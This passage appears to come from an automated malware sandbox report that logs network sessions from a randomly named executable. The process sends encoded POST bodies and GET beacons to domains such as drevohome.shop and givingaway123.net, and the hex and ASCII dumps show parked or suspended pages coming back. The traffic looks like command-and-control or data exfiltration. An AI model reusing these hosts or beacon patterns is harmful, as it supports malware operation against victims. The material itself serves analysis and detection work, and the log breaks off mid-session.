                                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        25192.168.2.2249188217.70.184.50801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:53:30.864892006 CEST473OUTGET /0bvj/?jnQX=JoV24jQMdS4/3i4C2Azs6HkIa5jkTaNy+Ik40cffOJE8Oz5kZb+e9PwZtqgkJTMo0IB+xAx5/WHdbF25CbK7oeKf/9ddGNs9w6nA5aUYEeZWEqUjEZt1tayRpXZ5&op9=BLtTm0V HTTP/1.1
                                                                                        Host: www.stocksm.fun
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Oct 9, 2024 12:53:31.428801060 CEST1236INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 09 Oct 2024 10:53:31 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Language
                                                                                        Data Raw: 37 37 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 73 74 6f 63 6b 73 6d 2e 66 75 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 [TRUNCATED]
                                                                                        Data Ascii: 779<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>stocksm.fun</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whoi [TRUNCATED]
                                                                                        Oct 9, 2024 12:53:31.428817034 CEST878INData Raw: 73 6d 2e 66 75 6e 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 73 74 6f 63 6b 73 6d 2e 66 75 6e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68 65 20 64 6f 6d 61
                                                                                        Data Ascii: sm.fun"><strong>View the WHOIS results of stocksm.fun</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_2023-bord


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        26192.168.2.224918954.38.220.85801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:53:36.489299059 CEST2472OUTPOST /v2k8/ HTTP/1.1
                                                                                        Host: www.drevohome.shop
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.drevohome.shop
                                                                                        Referer: http://www.drevohome.shop/v2k8/
                                                                                        Content-Length: 2161
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 61 52 4a 6b 47 2f 78 6a 65 61 78 49 7a 4a 41 72 57 38 44 35 36 47 69 62 43 76 76 2f 49 4d 4b 70 79 62 72 41 45 62 31 48 58 43 6f 47 76 6a 78 4f 34 68 50 33 62 70 49 55 31 54 37 6a 4d 43 36 41 34 4f 31 65 34 45 2b 4b 79 46 54 72 34 34 32 6b 35 42 42 50 34 36 4c 4f 48 78 6f 4a 62 4c 55 4a 75 4f 30 31 61 45 58 63 51 44 34 61 66 6d 51 48 58 57 74 46 6c 4b 2b 2b 70 48 75 79 43 41 38 66 36 4d 45 70 56 57 47 6b 7a 56 61 41 53 37 35 4a 74 70 78 78 2b 31 33 67 78 52 47 4d 41 54 36 2b 5a 47 74 58 62 69 54 54 35 6e 78 33 52 78 2b 37 66 38 65 6e 47 4c 57 78 4d 4f 47 77 48 55 71 68 74 4b 43 76 41 36 4b 57 41 5a 73 4b 78 59 65 78 30 57 79 6b 4a 72 6f 6d 32 50 6b 4e 72 6b 34 77 4e 50 58 2b 39 63 72 6a 73 65 74 46 2f 53 6d 32 67 5a 68 52 53 64 66 6a 71 59 51 76 68 49 66 70 73 4c 35 66 79 71 44 4c 6e 75 6b 64 2f 70 54 2b 36 78 58 57 6a 76 49 36 77 58 76 33 4a 71 4c 75 32 65 34 62 4c 37 34 46 31 54 34 32 57 55 72 79 58 2f 6e 72 54 55 6a 31 79 36 69 74 4a 2b 4f 48 4c 79 58 55 79 30 6c 41 6a 69 31 75 57 [TRUNCATED]
                                                                                        Data Ascii: jnQX=aRJkG/xjeaxIzJArW8D56GibCvv/IMKpybrAEb1HXCoGvjxO4hP3bpIU1T7jMC6A4O1e4E+KyFTr442k5BBP46LOHxoJbLUJuO01aEXcQD4afmQHXWtFlK++pHuyCA8f6MEpVWGkzVaAS75Jtpxx+13gxRGMAT6+ZGtXbiTT5nx3Rx+7f8enGLWxMOGwHUqhtKCvA6KWAZsKxYex0WykJrom2PkNrk4wNPX+9crjsetF/Sm2gZhRSdfjqYQvhIfpsL5fyqDLnukd/pT+6xXWjvI6wXv3JqLu2e4bL74F1T42WUryX/nrTUj1y6itJ+OHLyXUy0lAji1uWmkcoiz3vKjKKAeTCbpOdjMNZB8ftBkU8zp1n1wbkpCIU3JIIJqt3I7tYXmVwTJcoKhQr3e5XcKcYiH2SP4YLJzzWt/BMOCQS4QT/OU3mKY5EOwfM74ESCp3+/UfImjF+Jd0Vf3EI+OUG/hVd4XpKHCtyZx2oizOgsytswIAyPpO+EihbCUgX6GE9bXaQWBz6A2dUXTSFAr0vf9RuV5nGBuwsfparGjL+1cJRMDrMl7wazsS7hz9Juhowf7/i+PSBSUiZoJjaqVA27ZEqv+qsDTEv2f6S4BhnD0ITtPkf/JbSv0jQzDNvoJJ5n4Y8P7KEImFf9A9YAMxSpwN9lVYtkjMk3vh8whpXzgPml6Deb9J/m3UbuETziGKZqJuKjX8+pvjwVfKvLShYMNUKeF3J6n14A03ADl58nc+eLPJ8hlzQSMy+Dm1oLpkYV1UFDm82bTH/eMGMJGmA84HM1dEEdEyvoA5jSpVzwx7IxAIOruailPYd2tZcrSctw50orXwl1nU0N0EeSnAcCOBbHL5qxjZKhjjlzQYwWllfz5vfnJvNmEjeOCh8+xAmftqARV5EXsVVqiiicplD7Ei8d6EbLCgh945rPI3ReZaKWUYGxLKP3KOFyE9UQiDORXhF6Ucoq/txlATR35CzostDWfQw9ygI+pkhaxNyxJ [TRUNCATED]
                                                                                        Oct 9, 2024 12:53:36.502496958 CEST234OUTData Raw: 68 72 39 52 39 58 57 45 64 6d 68 59 45 43 69 71 30 78 66 69 45 47 52 4b 52 6b 7a 6e 48 4e 66 52 33 67 33 39 78 39 37 45 73 52 36 34 66 66 76 41 70 32 4e 48 52 56 4d 55 31 70 63 34 37 37 4a 58 75 64 72 31 64 79 52 37 6e 2f 4a 44 2b 67 4c 49 4a 44
                                                                                        Data Ascii: hr9R9XWEdmhYECiq0xfiEGRKRkznHNfR3g39x97EsR64ffvAp2NHRVMU1pc477JXudr1dyR7n/JD+gLIJD/l+3zQ8+UkKe6nzIEyXJzS/F1K+bCau05AmjwVHPiOGtFhUHqA/qXY6QFYZfhD4gPHf3Ay1hqWmdgsxPuidFlnhxO6o+60FmIwyXHJqOt3WbJvcmEimtfFrzYpk681NMOne+NRhk+1NdQhs6yV6ODQue


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        27192.168.2.224919054.38.220.85801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:53:39.225203991 CEST745OUTPOST /v2k8/ HTTP/1.1
                                                                                        Host: www.drevohome.shop
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.drevohome.shop
                                                                                        Referer: http://www.drevohome.shop/v2k8/
                                                                                        Content-Length: 201
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 61 52 4a 6b 47 2f 78 6a 65 61 78 49 7a 4f 30 72 55 75 37 35 72 57 69 62 42 76 76 2f 64 38 4b 76 79 62 6e 49 45 5a 5a 74 55 31 38 47 76 33 35 4f 34 53 6e 33 59 70 49 58 74 44 37 5a 43 69 36 56 34 4f 30 33 34 42 47 4b 79 46 48 72 35 61 4f 6b 75 77 42 51 30 71 4c 41 42 78 6f 49 62 4c 59 71 75 4f 77 44 61 46 2f 63 51 42 38 61 65 6d 41 48 48 45 56 46 75 71 2b 38 74 33 75 6c 43 41 67 77 36 4d 55 78 56 58 36 6b 77 6b 47 41 52 70 78 4a 6e 61 5a 78 30 56 33 68 34 78 48 74 4a 52 4c 75 41 46 68 72 53 55 76 39 38 32 74 32 65 78 43 5a 52 61 53 6f 45 35 4b 41 4a 59 33 2b 4c 6e 7a 6c 79 41 3d 3d
                                                                                        Data Ascii: jnQX=aRJkG/xjeaxIzO0rUu75rWibBvv/d8KvybnIEZZtU18Gv35O4Sn3YpIXtD7ZCi6V4O034BGKyFHr5aOkuwBQ0qLABxoIbLYquOwDaF/cQB8aemAHHEVFuq+8t3ulCAgw6MUxVX6kwkGARpxJnaZx0V3h4xHtJRLuAFhrSUv982t2exCZRaSoE5KAJY3+LnzlyA==


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        28192.168.2.224919154.38.220.85801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:53:41.762655020 CEST2472OUTPOST /v2k8/ HTTP/1.1
                                                                                        Host: www.drevohome.shop
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.drevohome.shop
                                                                                        Referer: http://www.drevohome.shop/v2k8/
                                                                                        Content-Length: 3625
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 61 52 4a 6b 47 2f 78 6a 65 61 78 49 79 75 6b 72 62 70 76 35 71 32 69 59 4b 50 76 2f 49 4d 4b 72 79 62 72 49 45 62 31 48 58 48 51 47 76 68 70 4f 34 78 50 33 61 70 49 58 72 44 37 6a 4d 43 36 48 34 4b 55 56 34 45 43 77 79 47 72 72 34 35 32 6b 35 43 5a 50 37 36 4c 4f 4b 52 6f 4c 62 4c 59 37 75 4b 73 48 61 46 37 32 51 42 30 61 65 55 6f 48 51 45 56 4b 71 61 2b 38 74 33 75 70 43 41 68 68 36 4d 4e 73 56 54 33 70 7a 58 4f 41 52 4c 35 4a 72 5a 78 79 6b 56 33 6c 31 52 47 43 41 54 32 48 5a 47 74 62 62 69 76 35 35 6e 74 33 44 79 32 37 66 37 71 6f 43 62 57 79 42 75 47 77 4b 30 71 76 74 4b 44 77 41 36 4b 57 41 5a 41 4b 77 49 65 78 30 58 79 37 57 37 6f 6d 38 76 6b 41 6d 45 38 4b 4e 50 44 41 39 59 58 5a 73 4e 68 46 2b 51 65 32 6e 70 68 52 61 4e 66 6c 71 59 51 69 75 6f 66 31 73 4c 67 73 79 71 54 62 6e 75 6b 64 2f 6f 7a 2b 2b 6b 6a 57 6e 2f 49 36 37 33 76 79 43 4b 4c 74 32 65 38 35 4c 37 38 46 31 58 30 32 58 6e 7a 79 66 63 50 6f 5a 45 6a 68 6a 4b 69 76 44 65 4f 65 4c 79 4c 79 79 31 64 36 6a 6d 78 75 57 [TRUNCATED]
                                                                                        Data Ascii: jnQX=aRJkG/xjeaxIyukrbpv5q2iYKPv/IMKrybrIEb1HXHQGvhpO4xP3apIXrD7jMC6H4KUV4ECwyGrr452k5CZP76LOKRoLbLY7uKsHaF72QB0aeUoHQEVKqa+8t3upCAhh6MNsVT3pzXOARL5JrZxykV3l1RGCAT2HZGtbbiv55nt3Dy27f7qoCbWyBuGwK0qvtKDwA6KWAZAKwIex0Xy7W7om8vkAmE8KNPDA9YXZsNhF+Qe2nphRaNflqYQiuof1sLgsyqTbnukd/oz++kjWn/I673vyCKLt2e85L78F1X02XnzyfcPoZEjhjKivDeOeLyLyy1d6jmxuWnIcpAb3vajVewePP7tSdlUjZBJitE0U/H11xHoUr5CGR3JSMJqX3JPyYSaV3iBcpKBQ9Um2GcKXSCHtJf4MLNauWsvvM6GQSIQTzI40u6Y8IuxaGb4WSCoM+6ghIXbF+It0VJrEI+OTXPhXXYrbKHOpyZtmohrOgdCtsxIAq/pOq0icRiUMX5789ejKXmVz5mKdHBHSUwrMtf9Ug15pGB+wsedKrH7L5UcJTurrEF6YZzsz7hzxJo9swbnvi7nSBWAifsdjQKV7w7ZAuv+RsCruv2zQS6hhnjUIRf3kcfJZZP0jLDCQvphz5lsu8LnKE6OFO9BrCwM2UpwO5lUFtkzMk3jh8x5pUEcPsyuDD79xxG3OROYjzmigZrN+KhD8/8TjgDjNzLTkSsNgdOFbJ6nH4E4nVgh58So+SPTG0hl0FCMlzjm/oPFOYUx+Fwy82bDH/tkGM5GmA84EM1dAEdIYvt9ijSpVpEl7InUIBLufglPHL2tHcrf3twhKoq7w/EHU0N0bTCnHViOObHGZqxiIKhvjlFIYxEtlR3ZvYHJvKmEgQuCk8+xQmb96AQV5V0kVSoKjgspkSrFh28HabMLzh505r8c3SvZaKmUYLxLLXnKXLSAhUQ/UOUzxFrEcuLvtzkAUK35fu4svDWjzw97tI+AThbpNyRJ [TRUNCATED]
                                                                                        Oct 9, 2024 12:53:41.769640923 CEST1698OUTData Raw: 68 57 39 56 31 58 57 43 39 6d 68 66 59 43 69 61 30 79 58 79 45 48 55 4b 52 6e 36 48 47 4f 66 52 33 4f 33 2f 30 71 37 48 67 52 39 71 58 66 2f 45 39 32 4e 58 51 51 48 30 30 30 4c 49 48 74 4a 58 79 52 72 77 67 48 52 4b 48 2f 4a 31 36 67 65 75 31 44
                                                                                        Data Ascii: hW9V1XWC9mhfYCia0yXyEHUKRn6HGOfR3O3/0q7HgR9qXf/E92NXQQH000LIHtJXyRrwgHRKH/J16geu1D1l+jtA8zUkO66njuEzGBwnXF36+bTIG1ygmlgFHeiOHwFhtOqF36XZyQFaBfgz4jGXf1MS1rqWjxgs5QuiNFljtxPa4+qkFmHQyePpqX1XqcJvpYaHeQdg7sb9kh7VpWfm6vHThf5xhXaxoFgzqGKFSTd1BAtxzZv


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        29192.168.2.224919254.38.220.85801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:53:44.304897070 CEST476OUTGET /v2k8/?jnQX=XThEFIcSG6Rk+ek7c8+em164NM7RE7zsg7f4UZ5pblIcrBlS4WXKWr830TKyJQKZuaIDwmyKi1LLwtKiy3gv2K3CAz8zZZIYsqZVYXDMbAsgSXM6eWVqobGzrSjZ&op9=BLtTm0V HTTP/1.1
                                                                                        Host: www.drevohome.shop
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Oct 9, 2024 12:53:45.024158001 CEST1236INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 09 Oct 2024 10:53:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 7468
                                                                                        Last-Modified: Thu, 08 Apr 2021 14:34:06 GMT
                                                                                        Connection: close
                                                                                        ETag: "606f145e-1d2c"
                                                                                        Accept-Ranges: bytes
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0d 0a 20 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 2c 20 6e 6f 6f 64 70 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 61 20 70 65 6e 64 69 6e 67 20 49 43 41 4e 4e 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 61 6e 64 20 69 73 20 73 75 73 70 65 6e 64 65 64 2e 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 65 79 2d 53 79 73 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"/> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet, noodp" /> <meta name="description" content="This domain has a pending ICANN verification and is suspended." /> <meta name="keywords" content="" /> <meta name="author" content="Key-Systems GmbH | CM" /> <meta name="publisher" content="Key-Systems GmbH" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" type="text/css" href="assets/css/bootstrap.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/font-awesome.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/screen.css"> <link rel="shortcut icon" href="assets/img/favicon.png"> <title>Contact Verification Suspension Page</title></head><body><header><div class="overlay bright"></div><div class="container"><div class="heading"><div class="row"><
                                                                                        Oct 9, 2024 12:53:45.024173975 CEST1236INData Raw: 68 31 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 75 73 70 65 6e 64 65 64 20 64 75 65 20 74 6f 20 6e 6f 6e 2d 63 6f 6d 70 6c 65 74 69 6f 6e 20 6f 66 20 61 6e 20 49 43 41 4e 4e 2d 6d 61 6e 64 61 74 65 64 20 63 6f 6e 74 61
                                                                                        Data Ascii: h1>This domain has been suspended due to non-completion of an ICANN-mandated contact verification.</h1><p>As part of the ongoing effort to improve contact quality, the Internet Corporation for Assigned Names and Numbers (ICANN) requires
                                                                                        Oct 9, 2024 12:53:45.024185896 CEST448INData Raw: 6f 6d 61 69 6e 20 72 65 67 69 73 74 72 61 6e 74 20 68 61 73 20 62 65 65 6e 20 6d 6f 64 69 66 69 65 64 20 6f 72 20 63 68 61 6e 67 65 64 20 62 75 74 20 6e 6f 74 20 76 65 72 69 66 69 65 64 20 79 65 74 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 0d 0a 09 09
                                                                                        Data Ascii: omain registrant has been modified or changed but not verified yet.</span><br>Changing the email address of the domain registrant requires a verification.</li><li><i class="fa fa-play"></i><span class="bold">The domain has recent
                                                                                        Oct 9, 2024 12:53:45.024452925 CEST1236INData Raw: 6c 20 61 64 64 72 65 73 73 65 73 2c 20 65 76 65 6e 20 61 66 74 65 72 20 69 6e 63 6f 6d 69 6e 67 20 74 72 61 6e 73 66 65 72 73 2e 3c 2f 6c 69 3e 0d 0a 09 09 09 09 09 3c 6c 69 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 70 6c 61 79 22 3e 3c
                                                                                        Data Ascii: l addresses, even after incoming transfers.</li><li><i class="fa fa-play"></i><span class="bold">Someone has complained about the accuracy of the data provided for publication in the WHOIS, triggering a re-verification of the email addr
                                                                                        Oct 9, 2024 12:53:45.024514914 CEST1236INData Raw: 6c 6c 20 62 65 20 75 6e 73 75 73 70 65 6e 64 65 64 20 77 69 74 68 69 6e 20 33 30 20 6d 69 6e 75 74 65 73 2e 0d 0a 09 09 09 50 6c 65 61 73 65 20 6d 61 6b 65 20 73 75 72 65 20 74 6f 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 61 6d 20 66 6f 6c 64 65
                                                                                        Data Ascii: ll be unsuspended within 30 minutes.Please make sure to check your spam folder if you cannot find that mail.</p><p><span class="bold">You can request to resend the verification email through your domain provider.</span><br>The
                                                                                        Oct 9, 2024 12:53:45.024525881 CEST1236INData Raw: 63 6f 6c 2d 73 6d 2d 6f 66 66 73 65 74 2d 32 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6c 69 63 65 22 3e 0d 0a 09 09 09 3c 68 32 3e 46 72 65 71 75 65 6e 74 6c 79 20 41 73 6b 65 64 20 51 75 65 73 74 69 6f 6e 73 3c 2f 68 32 3e 0d 0a
                                                                                        Data Ascii: col-sm-offset-2"><div class="slice"><h2>Frequently Asked Questions</h2><div class="icon_left"><span class="fa fa-user-circle"></span></div><div class="slice_content"><p><span class="bold">Why are domains w
                                                                                        Oct 9, 2024 12:53:45.024612904 CEST1084INData Raw: 2f 70 3e 0d 0a 0d 0a 09 09 09 09 3c 70 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 6f 6c 64 22 3e 48 6f 77 20 63 61 6e 20 49 20 72 65 61 63 74 69 76 61 74 65 20 6d 79 20 64 6f 6d 61 69 6e 20 61 6e 64 20 72 65 6d 6f 76 65 20 74 68 65 20 73 75 73
                                                                                        Data Ascii: /p><p><span class="bold">How can I reactivate my domain and remove the suspension?</span><br>This requires the completion of the verification process. You can resend the verification mail through your domain provider. Also, if de


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        30192.168.2.2249193103.224.182.242801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:53:50.238217115 CEST2472OUTPOST /1juc/ HTTP/1.1
                                                                                        Host: www.givingaway123.net
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.givingaway123.net
                                                                                        Referer: http://www.givingaway123.net/1juc/
                                                                                        Content-Length: 2161
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
